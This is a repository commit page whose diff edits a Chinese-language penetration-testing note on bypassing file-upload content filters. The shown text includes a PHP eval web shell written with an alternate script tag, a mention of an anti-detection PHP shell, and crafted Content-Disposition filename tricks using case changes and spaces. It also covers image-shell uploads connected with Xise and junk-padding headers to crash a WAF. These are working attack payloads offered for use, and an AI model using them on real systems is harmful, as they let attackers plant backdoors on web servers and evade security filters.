Mirrors_BOOKS/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2026-05-30 19:45:58 +08:00
Code Issues Actions 10 Packages Projects Releases Wiki Activity

add 文件上传内容检测绕过

Browse Source
This commit is contained in:
Mrxn
2020-06-20 14:48:56 +08:00
parent 1440cadaa8
commit 9e6cc77dbf
1 changed files with 13 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files
books/文件上传内容检测绕过.md
+4
View File
@@ -4,6 +4,7 @@
如果是apache可以看看这篇文章:https://thibaud-robin.fr/articles/bypass-filter-upload/
2.如果检测是`<?php ?>`
可以试一试使用其他标签,如
```
<script language="php">
eval($_POST[2333]);
@@ -18,6 +19,7 @@
```
3.如果检测的不是php标签,是敏感内容的话,这里送你一个免杀php马
```php
<?php
@@ -75,6 +77,7 @@ name="form1" enctype="multipart/formdata">
<input type="submit" name="Submit" value="上传">
</form>
```
9.HTTP header 属性值绕过
`Content-Disposition: form-data; name="file"; filename="yjh.php"`
@@ -118,6 +121,7 @@ Content-Disposition: form-data; name="up_picture"; filename="xss.php"
百度云绕过就简单的很多很多,在对文件名大小写上面没有检测php是过了的,Php就能过,或者PHP,一句话自己合成图片马用Xise连接即可。
`Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"`
15.填充垃圾数据,造成溢出后使WAF崩掉
```
Content-Disposition: 字段溢出即可 比如Content-Disposition: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA一直加就行了十万++
```